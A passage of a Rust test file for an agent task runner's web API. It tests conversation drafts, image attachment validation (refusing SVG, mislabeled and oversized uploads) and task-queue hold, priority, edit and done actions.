5813 Questions::at(home.path().join("questions")),
5814 talks.clone(),
5815 home.path().join("runs"),
5816 home.path().to_path_buf(),
5817 repo.clone(),
5818 )
5819 .with_worktrees_root(home.path().join("wt")),
5820 );
5821 let cfg = config_for(&repo).await.expect("discover config");
5822
5823 for attempt in 0..3u32 {
5824 let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
5825 let id = talk.id.clone();
5826 let turn_guard = ui
5829 .begin_talk_turn(&id)
5830 .expect("claim the turn")
5831 .expect("a fresh talk owes nobody a turn");
5832
5833 let (reached_tx, reached_rx) = tokio::sync::oneshot::channel();
5834 let (release_tx, release_rx) = std::sync::mpsc::channel();
5835 ui.set_busy_queue_gate(BusyQueueGate {
5836 reached: reached_tx,
5837 release: release_rx,
5838 });
5839
5840 let handler = tokio::spawn(talk_say(
5841 State(Arc::clone(&ui)),
5842 Path(id.clone()),
5843 Ok(Json(NewTalkTurn {
5844 text: "what does the queue module do?".to_owned(),
5845 attachments: Vec::new(),
5846 })),
5847 ));
5848
5849 tokio::time::timeout(Duration::from_secs(5), reached_rx)
5854 .await
5855 .unwrap_or_else(|_| {
5856 panic!(
5857 "attempt {attempt}: talk {id} never reached the busy branch's queue write"
5858 )
5859 })
5860 .expect("the busy branch dropped the gate without using it");
5861
5862 let running = talks.get(&id).expect("reload talk");
5869 drain_loop(running, talks.clone(), cfg.clone(), id.clone(), turn_guard).await;
5870
5871 handler.abort();
5875 let _ = handler.await;
5876
5877 let _ = release_tx.send(());
5883
5884 let mut fresh = talks.get(&id).expect("reload talk");
5887 for _ in 0..SETTLE_STEPS {
5888 if fresh.pending.is_empty() && fresh.turns.len() == 2 {
5889 break;
5890 }
5891 tokio::time::sleep(Duration::from_millis(10)).await;
5892 fresh = talks.get(&id).expect("reload talk");
5893 }
5894 assert!(
5895 fresh.pending.is_empty() && fresh.turns.len() == 2,
5896 "attempt {attempt}: talk {id} left the operator's text queued \
5897 with no drainer - the reclaimed turn was dropped along with \
5898 the handler future (pending {:?}, {} turns)",
5899 fresh.pending,
5900 fresh.turns.len()
5901 );
5902 }
5903 }
5904
5905 #[tokio::test]
5906 async fn editing_a_recovered_pending_draft_restarts_its_drain_once() {
5907 let (_tmp, _repo, f) = talk_fixture().await;
5908 let id = f.post("/api/talks", None).await.json()["id"]
5909 .as_str()
5910 .expect("id")
5911 .to_owned();
5912 let store = f.talks();
5913 let mut recovered = store.get(&id).expect("opened talk");
5914 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5915 .expect("persist pending draft without a live turn");
5916
5917 let edited = f
5918 .post(
5919 &format!("/api/talks/{id}/pending/edit"),
5920 Some(r#"{"text":"corrected","expected_text":"saved before restart","expected_attachments":[]}"#),
5921 )
5922 .await;
5923 assert_eq!(edited.status, 200, "{}", edited.body);
5924 assert!(edited.json()["thinking"].as_bool().unwrap());
5925
5926 let mut detail = f.get(&format!("/api/talks/{id}")).await.json();
5927 for _ in 0..SETTLE_STEPS {
5928 if detail["turns"].as_array().expect("turns").len() == 2 {
5929 break;
5930 }
5931 tokio::time::sleep(Duration::from_millis(10)).await;
5932 detail = f.get(&format!("/api/talks/{id}")).await.json();
5933 }
5934 let turns = detail["turns"].as_array().expect("turns");
5935 assert_eq!(
5936 turns.len(),
5937 2,
5938 "the recovered draft must run once: {detail}"
5939 );
5940 assert_eq!(turns[0]["body"], "corrected");
5941 assert_eq!(detail["pending"], "");
5942 }
5943
5944 #[tokio::test]
5945 async fn recovered_pending_requires_explicit_resume_and_duplicate_resume_runs_once() {
5946 let tmp = TempDir::new().expect("tempdir");
5947 let repo = tmp.path().join("repo");
5948 std::fs::create_dir_all(&repo).expect("repo dir");
5949 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
5950 let f = Fixture::with_repo(repo).await;
5951 let id = f.post("/api/talks", None).await.json()["id"]
5952 .as_str()
5953 .expect("id")
5954 .to_owned();
5955 let store = f.talks();
5956 let mut recovered = store.get(&id).expect("opened talk");
5957 talk::queue(&mut recovered, &store, "saved before restart", Vec::new())
5958 .expect("persist pending draft without a live turn");
5959
5960 let refused = f
5961 .post(
5962 &format!("/api/talks/{id}/say"),
5963 Some(r#"{"text":"new message"}"#),
5964 )
5965 .await;
5966 assert_eq!(refused.status, 409, "{}", refused.body);
5967 assert!(refused.body.contains("resume"), "{}", refused.body);
5968 let saved = store.get(&id).expect("draft remains after refusal");
5969 assert!(saved.turns.is_empty());
5970 assert_eq!(saved.pending, "saved before restart");
5971
5972 let say_path = format!("/api/talks/{id}/say");
5973 let (first, second) = tokio::join!(
5974 f.post(&say_path, Some(r#"{"text":"concurrent one"}"#)),
5975 f.post(&say_path, Some(r#"{"text":"concurrent two"}"#)),
5976 );
5977 assert_eq!(first.status, 409, "{}", first.body);
5978 assert_eq!(second.status, 409, "{}", second.body);
5979 let saved = store
5980 .get(&id)
5981 .expect("draft remains after concurrent refusals");
5982 assert!(saved.turns.is_empty());
5983 assert_eq!(saved.pending, "saved before restart");
5984
5985 let resumed = f
5986 .post(&format!("/api/talks/{id}/pending/resume"), None)
5987 .await;
5988 assert_eq!(resumed.status, 202, "{}", resumed.body);
5989 let duplicate = f
5990 .post(&format!("/api/talks/{id}/pending/resume"), None)
5991 .await;
5992 assert_eq!(duplicate.status, 409, "{}", duplicate.body);
5993
5994 for _ in 0..SETTLE_STEPS {
5995 if store.get(&id).expect("talk").turns.len() == 2 {
5996 break;
5997 }
5998 tokio::time::sleep(Duration::from_millis(10)).await;
5999 }
6000 let finished = store.get(&id).expect("finished talk");
6001 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6002 assert_eq!(finished.turns[0].body, "saved before restart");
6003 assert!(finished.pending.is_empty());
6004 }
6005
6006 #[tokio::test]
6007 async fn an_image_only_recovered_draft_resumes_without_text() {
6008 let (_tmp, _repo, f) = talk_fixture().await;
6009 let id = f.post("/api/talks", None).await.json()["id"]
6010 .as_str()
6011 .expect("id")
6012 .to_owned();
6013 let uploaded = f
6014 .post_bytes(
6015 &format!("/api/talks/{id}/attachments"),
6016 &[("Content-Type", "image/png"), ("X-Filename", "saved.png")],
6017 PNG_BYTES,
6018 )
6019 .await;
6020 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6021 let attachment = f
6022 .talks()
6023 .attachment_meta(&id, uploaded.json()["id"].as_str().expect("attachment id"))
6024 .expect("attachment metadata")
6025 .expect("stored attachment");
6026 let store = f.talks();
6027 let mut recovered = store.get(&id).expect("opened talk");
6028 talk::queue(&mut recovered, &store, "", vec![attachment]).expect("queue image only");
6029
6030 let resumed = f
6031 .post(&format!("/api/talks/{id}/pending/resume"), None)
6032 .await;
6033 assert_eq!(resumed.status, 202, "{}", resumed.body);
6034 for _ in 0..SETTLE_STEPS {
6035 if store.get(&id).expect("talk").turns.len() == 2 {
6036 break;
6037 }
6038 tokio::time::sleep(Duration::from_millis(10)).await;
6039 }
6040 let finished = store.get(&id).expect("finished talk");
6041 assert_eq!(finished.turns.len(), 2, "{finished:?}");
6042 assert!(finished.turns[0].body.is_empty());
6043 assert_eq!(finished.turns[0].attachments.len(), 1);
6044 assert!(finished.pending_attachments.is_empty());
6045 }
6046
6047 #[tokio::test]
6048 async fn closed_talk_refuses_pending_mutations_without_changing_the_record() {
6049 let (_tmp, _repo, f) = talk_fixture().await;
6050 let id = f.post("/api/talks", None).await.json()["id"]
6051 .as_str()
6052 .expect("id")
6053 .to_owned();
6054 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6055 assert_eq!(closed.status, 200, "{}", closed.body);
6056 let before_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6057 .expect("serialize closed talk");
6058 for (path, body) in [
6059 (format!("/api/talks/{id}/pending/resume"), None),
6060 (
6061 format!("/api/talks/{id}/pending/clear"),
6062 Some(r#"{"expected_text":"","expected_attachments":[]}"#),
6063 ),
6064 (
6065 format!("/api/talks/{id}/pending/edit"),
6066 Some(r#"{"text":"x","expected_text":"","expected_attachments":[]}"#),
6067 ),
6068 (format!("/api/talks/{id}/say"), Some(r#"{"text":"x"}"#)),
6069 ] {
6070 let response = f.post(&path, body).await;
6071 assert_eq!(response.status, 409, "{}", response.body);
6072 }
6073 let after_clear = serde_json::to_value(f.talks().get(&id).expect("closed talk"))
6074 .expect("serialize closed talk");
6075 assert_eq!(
6076 after_clear, before_clear,
6077 "clear must not rewrite a closed talk"
6078 );
6079 }
6080
6081 const SLOW_MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && sleep 0.3 && printf ok\"]\n";
6084
6085 #[tokio::test]
6086 async fn talks_report_independent_thinking_claims_and_queue_a_second_message() {
6087 let tmp = TempDir::new().expect("tempdir");
6088 let repo = tmp.path().join("repo");
6089 std::fs::create_dir_all(&repo).expect("repo dir");
6090 std::fs::write(repo.join("magi.toml"), SLOW_MOCK_AGENT_TOML).expect("write config");
6091 let f = Fixture::with_repo(repo).await;
6092 let id_a = f.post("/api/talks", None).await.json()["id"]
6093 .as_str()
6094 .unwrap()
6095 .to_owned();
6096 let id_b = f.post("/api/talks", None).await.json()["id"]
6097 .as_str()
6098 .unwrap()
6099 .to_owned();
6100
6101 let a = f
6102 .post(&format!("/api/talks/{id_a}/say"), Some(r#"{"text":"a"}"#))
6103 .await;
6104 assert_eq!(a.status, 202, "{}", a.body);
6105 assert_eq!(a.json()["thinking"], true);
6106 let b = f
6107 .post(&format!("/api/talks/{id_b}/say"), Some(r#"{"text":"b"}"#))
6108 .await;
6109 assert_eq!(b.status, 202, "{}", b.body);
6110 assert_eq!(b.json()["thinking"], true);
6111
6112 let listed = f.get("/api/talks").await.json();
6113 for id in [&id_a, &id_b] {
6114 let view = listed
6115 .as_array()
6116 .unwrap()
6117 .iter()
6118 .find(|talk| talk["id"] == *id)
6119 .unwrap();
6120 assert_eq!(view["thinking"], true, "{listed}");
6121 }
6122 let repeated = f
6123 .post(
6124 &format!("/api/talks/{id_a}/say"),
6125 Some(r#"{"text":"again"}"#),
6126 )
6127 .await;
6128 assert_eq!(repeated.status, 202, "{}", repeated.body);
6129 assert_eq!(repeated.json()["pending"], "again");
6130 }
6131
6132 const PNG_BYTES: &[u8] = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR\x00\x00\x00\x01";
6135
6136 #[tokio::test]
6137 async fn a_png_attachment_upload_is_201_and_get_returns_it_with_nosniff() {
6138 let f = Fixture::start().await;
6139 let id = seed_talk(&f, "20260905-000000-a1b2", "open");
6140
6141 let res = f
6142 .post_bytes(
6143 &format!("/api/talks/{id}/attachments"),
6144 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6145 PNG_BYTES,
6146 )
6147 .await;
6148 assert_eq!(res.status, 201, "{}", res.body);
6149 let body = res.json();
6150 assert_eq!(body["name"], "shot.png");
6151 assert_eq!(body["mime"], "image/png");
6152 assert_eq!(body["bytes"], PNG_BYTES.len());
6153 let att_id = body["id"].as_str().expect("id").to_owned();
6154 assert_eq!(
6155 att_id.len(),
6156 32,
6157 "the id must never be a client-suppliable path: {att_id}"
6158 );
6159
6160 let got = f
6161 .get(&format!("/api/talks/{id}/attachments/{att_id}"))
6162 .await;
6163 assert_eq!(got.status, 200, "{}", got.body);
6164 assert_eq!(got.header("content-type"), Some("image/png"));
6165 assert_eq!(got.header("x-content-type-options"), Some("nosniff"));
6166 assert_eq!(got.bytes, PNG_BYTES);
6167 }
6168
6169 #[tokio::test]
6170 async fn an_svg_a_text_file_and_an_oversized_upload_are_all_4xx() {
6171 let f = Fixture::start().await;
6172 let id = seed_talk(&f, "20260905-000000-c3d4", "open");
6173
6174 let svg = f
6177 .post_bytes(
6178 &format!("/api/talks/{id}/attachments"),
6179 &[("Content-Type", "image/svg+xml")],
6180 b"<svg xmlns=\"http://www.w3.org/2000/svg\"></svg>",
6181 )
6182 .await;
6183 assert!(
6184 (400..500).contains(&svg.status),
6185 "svg must be refused: {} {}",
6186 svg.status,
6187 svg.body
6188 );
6189 assert!(svg.body.contains("SVG"), "{}", svg.body);
6190
6191 let text = f
6192 .post_bytes(
6193 &format!("/api/talks/{id}/attachments"),
6194 &[("Content-Type", "text/plain")],
6195 b"just some text",
6196 )
6197 .await;
6198 assert!(
6199 (400..500).contains(&text.status),
6200 "an unlisted type must be refused: {} {}",
6201 text.status,
6202 text.body
6203 );
6204
6205 let oversized = vec![0u8; ATTACHMENT_MAX_BYTES + 1];
6208 let big = f
6209 .post_bytes(
6210 &format!("/api/talks/{id}/attachments"),
6211 &[("Content-Type", "image/png")],
6212 &oversized,
6213 )
6214 .await;
6215 assert_eq!(
6216 big.status,
6217 StatusCode::PAYLOAD_TOO_LARGE.as_u16(),
6218 "{}",
6219 big.body
6220 );
6221 }
6222
6223 #[tokio::test]
6224 async fn a_mislabeled_upload_is_refused_even_though_the_declared_type_is_on_the_whitelist() {
6225 let f = Fixture::start().await;
6226 let id = seed_talk(&f, "20260905-000000-d4e5", "open");
6227
6228 let res = f
6231 .post_bytes(
6232 &format!("/api/talks/{id}/attachments"),
6233 &[("Content-Type", "image/png")],
6234 b"<html>not a picture</html>",
6235 )
6236 .await;
6237 assert!((400..500).contains(&res.status), "{}", res.body);
6238 }
6239
6240 #[tokio::test]
6241 async fn an_unknown_attachment_id_is_a_404() {
6242 let f = Fixture::start().await;
6243 let id = seed_talk(&f, "20260905-000000-e5f6", "open");
6244
6245 let res = f
6246 .get(&format!("/api/talks/{id}/attachments/{}", "0".repeat(32)))
6247 .await;
6248 assert_eq!(res.status, 404, "{}", res.body);
6249 }
6250
6251 #[tokio::test]
6252 async fn talk_say_with_only_an_attachment_and_no_body_is_accepted_and_persists() {
6253 let f = Fixture::start().await;
6254 let id = seed_talk(&f, "20260905-000000-f6a7", "open");
6255
6256 let uploaded = f
6257 .post_bytes(
6258 &format!("/api/talks/{id}/attachments"),
6259 &[("Content-Type", "image/png"), ("X-Filename", "shot.png")],
6260 PNG_BYTES,
6261 )
6262 .await;
6263 assert_eq!(uploaded.status, 201, "{}", uploaded.body);
6264 let att_id = uploaded.json()["id"].as_str().expect("id").to_owned();
6265
6266 let res = f
6267 .post(
6268 &format!("/api/talks/{id}/say"),
6269 Some(&format!(r#"{{"text":"","attachments":["{att_id}"]}}"#)),
6270 )
6271 .await;
6272 assert_eq!(res.status, 202, "{}", res.body);
6273 let queued = res.json();
6274 let turns = queued["turns"].as_array().expect("turns array");
6275 assert_eq!(
6276 turns.len(),
6277 1,
6278 "an empty body with an attachment is still a turn: {queued}"
6279 );
6280 assert_eq!(turns[0]["who"], "operator");
6281 assert_eq!(turns[0]["body"], "");
6282 let atts = turns[0]["attachments"]
6283 .as_array()
6284 .expect("attachments array");
6285 assert_eq!(atts.len(), 1);
6286 assert_eq!(atts[0]["id"], att_id);
6287 assert_eq!(atts[0]["mime"], "image/png");
6288
6289 let on_disk = f.talks().get(&id).expect("get");
6292 assert_eq!(on_disk.turns[0].attachments.len(), 1);
6293 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
6294 }
6295
6296 #[tokio::test]
6297 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
6298 let f = Fixture::start().await;
6299 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
6300
6301 let res = f
6302 .post(
6303 &format!("/api/talks/{id}/say"),
6304 Some(&format!(
6305 r#"{{"text":"hi","attachments":["{}"]}}"#,
6306 "a".repeat(32)
6307 )),
6308 )
6309 .await;
6310 assert!((400..500).contains(&res.status), "{}", res.body);
6311 assert!(res.body.contains("unknown attachment"), "{}", res.body);
6312
6313 let on_disk = f.talks().get(&id).expect("get");
6314 assert!(
6315 on_disk.turns.is_empty(),
6316 "a rejected attachment id must not partially record the turn: {:?}",
6317 on_disk.turns
6318 );
6319 }
6320
6321 #[tokio::test]
6322 async fn talk_close_makes_the_talk_refuse_further_turns() {
6323 let f = Fixture::start().await;
6324 let id = seed_talk(&f, "20260904-014455-cd34", "open");
6325
6326 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6327 assert_eq!(closed.status, 200, "{}", closed.body);
6328 assert_eq!(closed.json()["status"], "closed");
6329
6330 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
6332 assert_eq!(closed_again.status, 200);
6333 assert_eq!(closed_again.json()["status"], "closed");
6334
6335 let said = f
6336 .post(
6337 &format!("/api/talks/{id}/say"),
6338 Some(r#"{"text":"too late"}"#),
6339 )
6340 .await;
6341 assert_eq!(said.status, 409, "{}", said.body);
6342 }
6343
6344 #[tokio::test]
6345 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
6346 let (_tmp, _repo, f) = talk_fixture().await;
6347 let id = f.post("/api/talks", None).await.json()["id"]
6348 .as_str()
6349 .expect("id")
6350 .to_owned();
6351 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
6352 assert_eq!(closed.status, 200, "{}", closed.body);
6353
6354 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6355 assert_eq!(reopened.status, 200, "{}", reopened.body);
6356 assert_eq!(reopened.json()["status"], "open");
6357
6358 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
6360 assert_eq!(reopened_again.status, 200);
6361 assert_eq!(reopened_again.json()["status"], "open");
6362
6363 let said = f
6364 .post(
6365 &format!("/api/talks/{id}/say"),
6366 Some(r#"{"text":"still there?"}"#),
6367 )
6368 .await;
6369 assert_eq!(
6370 said.status, 202,
6371 "a reopened talk accepts turns again: {}",
6372 said.body
6373 );
6374 }
6375
6376 #[tokio::test]
6377 async fn talk_reopen_on_an_unknown_id_is_404() {
6378 let f = Fixture::start().await;
6379 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
6380 assert_eq!(res.status, 404, "{}", res.body);
6381 }
6382
6383 #[tokio::test]
6384 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
6385 let f = Fixture::start().await;
6386 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
6387
6388 let deleted = f.delete(&format!("/api/talks/{id}")).await;
6389 assert_eq!(deleted.status, 204, "{}", deleted.body);
6390
6391 let after = f.get(&format!("/api/talks/{id}")).await;
6392 assert_eq!(after.status, 404, "{}", after.body);
6393
6394 let listed = f.get("/api/talks").await.json();
6395 assert!(
6396 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
6397 "a deleted talk must not linger in the list: {listed}"
6398 );
6399 }
6400
6401 #[tokio::test]
6402 async fn talk_delete_on_an_unknown_id_is_404() {
6403 let f = Fixture::start().await;
6404 let res = f.delete("/api/talks/nonexistent-id").await;
6405 assert_eq!(res.status, 404, "{}", res.body);
6406 }
6407
6408 #[tokio::test]
6409 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
6410 let f = Fixture::start().await;
6411 let queue = f.queue();
6412 let mut task = Task::new(
6413 "spent".to_owned(),
6414 "Try again".to_owned(),
6415 PathBuf::from("/repo/magi"),
6416 Source::Human,
6417 );
6418 task.start("20260902-140502-bbbb".to_owned());
6419 task.fail("agent gave up", 9);
6420 queue.put(&mut task).expect("file the task");
6421
6422 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6423 assert_eq!(held.status, 200);
6424 assert_eq!(held.json()["status_str"], "held");
6425
6426 let released = f
6427 .post(&format!("/api/queue/{}/release", task.id), None)
6428 .await;
6429 assert_eq!(released.status, 200);
6430 assert_eq!(released.json()["status_str"], "queued");
6431 assert_eq!(
6432 released.json()["attempts"],
6433 0,
6434 "release is a real second chance, not an instant re-hold"
6435 );
6436 assert_eq!(
6437 queue.get(&task.id).expect("reload").status,
6438 TaskStatus::Queued,
6439 "the change is on disk, not only in the reply"
6440 );
6441 assert!(
6442 !f.home
6443 .path()
6444 .join("queue")
6445 .join(format!("{}.lock", task.id))
6446 .exists(),
6447 "the claim the mutation took is released again"
6448 );
6449 }
6450
6451 #[tokio::test]
6452 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
6453 let f = Fixture::start().await;
6454 let queue = f.queue();
6455 let mut task = Task::new(
6456 "busy".to_owned(),
6457 "Running right now".to_owned(),
6458 PathBuf::from("/repo/magi"),
6459 Source::Human,
6460 );
6461 queue.put(&mut task).expect("file the task");
6462 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6463
6464 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
6465
6466 assert_eq!(res.status, 409);
6467 assert_eq!(
6468 queue.get(&task.id).expect("reload").status,
6469 TaskStatus::Queued,
6470 "the refused hold changed nothing"
6471 );
6472 }
6473
6474 #[tokio::test]
6475 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
6476 let f = Fixture::start().await;
6477 let queue = f.queue();
6478 let mut task = Task::new(
6479 "waiting on the migration".to_owned(),
6480 "Do the thing".to_owned(),
6481 PathBuf::from("/repo/magi"),
6482 Source::Human,
6483 );
6484 queue.put(&mut task).expect("file the task");
6485
6486 let held = f
6487 .post(
6488 &format!("/api/queue/{}/hold", task.id),
6489 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
6490 )
6491 .await;
6492 assert_eq!(held.status, 200, "{}", held.body);
6493 assert_eq!(held.json()["status_str"], "held");
6494 assert_eq!(
6495 held.json()["hold_reason"],
6496 "waiting for 20260101-000000-aaaa to land"
6497 );
6498
6499 let listed = f.get("/api/queue").await.json();
6500 assert_eq!(
6501 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
6502 "the card reads the reason off the same list route"
6503 );
6504
6505 let mut plain = Task::new(
6508 "no reason given".to_owned(),
6509 "Do another thing".to_owned(),
6510 PathBuf::from("/repo/magi"),
6511 Source::Human,
6512 );
6513 queue.put(&mut plain).expect("file the task");
6514 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
6515 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
6516 assert!(held_plain.json()["hold_reason"].is_null());
6517
6518 let released = f
6519 .post(&format!("/api/queue/{}/release", task.id), None)
6520 .await;
6521 assert_eq!(released.status, 200);
6522 assert!(
6523 released.json()["hold_reason"].is_null(),
6524 "a release must clear the reason so the next hold does not inherit it"
6525 );
6526 }
6527
6528 #[tokio::test]
6529 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
6530 let f = Fixture::start().await;
6531 let queue = f.queue();
6532 let mut older = Task::new(
6533 "filed first".to_owned(),
6534 "x".to_owned(),
6535 PathBuf::from("/repo/magi"),
6536 Source::Human,
6537 );
6538 older.id = "20260101-000001-aaaa".to_owned();
6539 let mut newer = Task::new(
6540 "filed second".to_owned(),
6541 "x".to_owned(),
6542 PathBuf::from("/repo/magi"),
6543 Source::Human,
6544 );
6545 newer.id = "20260101-000002-bbbb".to_owned();
6546 queue.put(&mut older).expect("file older");
6547 queue.put(&mut newer).expect("file newer");
6548
6549 let before = f.get("/api/queue").await.json();
6552 assert_eq!(before[0]["id"], newer.id);
6553 assert_eq!(before[1]["id"], older.id);
6554
6555 let raised = f
6559 .post(
6560 &format!("/api/queue/{}/priority", older.id),
6561 Some(r#"{"priority":10}"#),
6562 )
6563 .await;
6564 assert_eq!(raised.status, 200, "{}", raised.body);
6565 assert_eq!(raised.json()["priority"], 10);
6566
6567 let after = f.get("/api/queue").await.json();
6568 let names: Vec<&str> = after
6569 .as_array()
6570 .unwrap()
6571 .iter()
6572 .map(|t| t["id"].as_str().unwrap())
6573 .collect();
6574 assert_eq!(names[0], older.id, "the raised task now sorts first");
6578 }
6579
6580 #[tokio::test]
6581 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
6582 let f = Fixture::start().await;
6583 let queue = f.queue();
6584 let mut task = Task::new(
6585 "in flight".to_owned(),
6586 "x".to_owned(),
6587 PathBuf::from("/repo/magi"),
6588 Source::Human,
6589 );
6590 task.start("20260902-140502-bbbb".to_owned());
6591 queue.put(&mut task).expect("file the task");
6592
6593 let res = f
6594 .post(
6595 &format!("/api/queue/{}/priority", task.id),
6596 Some(r#"{"priority":9}"#),
6597 )
6598 .await;
6599 assert_eq!(res.status, 400, "{}", res.body);
6600 assert!(
6601 res.json()["error"]
6602 .as_str()
6603 .is_some_and(|e| e.contains("running")),
6604 "{}",
6605 res.body
6606 );
6607 assert_eq!(
6608 queue.get(&task.id).expect("reload").priority,
6609 0,
6610 "the refused write must not partially apply"
6611 );
6612 }
6613
6614 #[tokio::test]
6615 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
6616 let f = Fixture::start().await;
6617 let queue = f.queue();
6618 let mut task = Task::new(
6619 "old title".to_owned(),
6620 "old instruction".to_owned(),
6621 PathBuf::from("/repo/magi"),
6622 Source::Agent {
6623 run: "20260101-000000-beef".to_owned(),
6624 node: "implement".to_owned(),
6625 },
6626 );
6627 task.runs.push("20260101-000000-beef".to_owned());
6628 queue.put(&mut task).expect("file the task");
6629 let created_at = task.created_at;
6630
6631 let edited = f
6632 .post(
6633 &format!("/api/queue/{}/edit", task.id),
6634 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
6635 )
6636 .await;
6637 assert_eq!(edited.status, 200, "{}", edited.body);
6638 let body = edited.json();
6639 assert_eq!(body["title"], "new title");
6640 assert_eq!(body["instruction"], "new instruction");
6641 assert_eq!(body["id"], task.id, "editing must not mint a new id");
6642 assert_eq!(body["created_at"], created_at.to_string());
6643 assert_eq!(
6644 body["source"]["kind"], "agent",
6645 "editing a task an agent filed must not turn it human: {body}"
6646 );
6647 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6648
6649 let reloaded = queue.get(&task.id).expect("reload");
6650 assert_eq!(reloaded.title, "new title");
6651 assert_eq!(reloaded.instruction, "new instruction");
6652 }
6653
6654 #[tokio::test]
6655 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6656 let f = Fixture::start().await;
6657 let queue = f.queue();
6658 let mut task = Task::new(
6659 "in flight".to_owned(),
6660 "do not touch".to_owned(),
6661 PathBuf::from("/repo/magi"),
6662 Source::Human,
6663 );
6664 task.start("20260902-140502-bbbb".to_owned());
6665 queue.put(&mut task).expect("file the task");
6666
6667 let res = f
6668 .post(
6669 &format!("/api/queue/{}/edit", task.id),
6670 Some(r#"{"title":"x","instruction":"y"}"#),
6671 )
6672 .await;
6673 assert_eq!(res.status, 400, "{}", res.body);
6674 assert!(
6675 res.json()["error"]
6676 .as_str()
6677 .is_some_and(|e| e.contains("running")),
6678 "{}",
6679 res.body
6680 );
6681 assert_eq!(
6682 queue.get(&task.id).expect("reload").instruction,
6683 "do not touch",
6684 "the refused edit must not change the file"
6685 );
6686 }
6687
6688 #[tokio::test]
6689 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6690 let f = Fixture::start().await;
6691 let queue = f.queue();
6692 let mut task = Task::new(
6693 "busy".to_owned(),
6694 "Running right now".to_owned(),
6695 PathBuf::from("/repo/magi"),
6696 Source::Human,
6697 );
6698 queue.put(&mut task).expect("file the task");
6699 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
6700
6701 let priority = f
6702 .post(
6703 &format!("/api/queue/{}/priority", task.id),
6704 Some(r#"{"priority":9}"#),
6705 )
6706 .await;
6707 assert_eq!(priority.status, 409, "{}", priority.body);
6708
6709 let edit = f
6710 .post(
6711 &format!("/api/queue/{}/edit", task.id),
6712 Some(r#"{"title":"x","instruction":"y"}"#),
6713 )
6714 .await;
6715 assert_eq!(edit.status, 409, "{}", edit.body);
6716 }
6717
6718 #[tokio::test]
6719 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
6720 let f = Fixture::start().await;
6721 let queue = f.queue();
6722 let mut task = Task::new(
6723 "shipped by hand".to_owned(),
6724 "merged outside the loop".to_owned(),
6725 PathBuf::from("/repo/magi"),
6726 Source::Agent {
6727 run: "20260101-000000-b455".to_owned(),
6728 node: "implement".to_owned(),
6729 },
6730 );
6731 task.runs.push("20260101-000000-b455".to_owned());
6732 task.runs.push("20260101-000000-9af4".to_owned());
6733 queue.put(&mut task).expect("file the task");
6734 let created_at = task.created_at;
6735
6736 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6737 assert_eq!(done.status, 200, "{}", done.body);
6738 assert_eq!(done.json()["status_str"], "done");
6739
6740 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
6741 assert_eq!(
6742 reloaded.runs,
6743 ["20260101-000000-b455", "20260101-000000-9af4"]
6744 );
6745 assert_eq!(
6746 reloaded.source,
6747 Source::Agent {
6748 run: "20260101-000000-b455".to_owned(),
6749 node: "implement".to_owned(),
6750 }
6751 );
6752 assert_eq!(reloaded.created_at, created_at);
6753 }
6754
6755 #[tokio::test]
6756 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
6757 let f = Fixture::start().await;
6762 let queue = f.queue();
6763 let mut task = Task::new(
6764 "landed while held".to_owned(),
6765 "x".to_owned(),
6766 PathBuf::from("/repo/magi"),
6767 Source::Human,
6768 );
6769 task.hold_manual(Some("waiting on 3ed9".to_owned()));
6770 queue.put(&mut task).expect("file the held task");
6771
6772 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6773 assert_eq!(done.status, 200, "{}", done.body);
6774 assert_eq!(done.json()["status_str"], "done");
6775 assert!(
6776 done.json()["hold_reason"].is_null(),
6777 "a done task cannot still be waiting on something: {}",
6778 done.body
6779 );
6780 }
6781
6782 #[tokio::test]
6783 async fn unknown_ids_are_json_not_found_on_both_stores() {
6784 let f = Fixture::start().await;
6785
6786 let run = f.get("/api/runs/nosuchrun").await;
6787 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6788
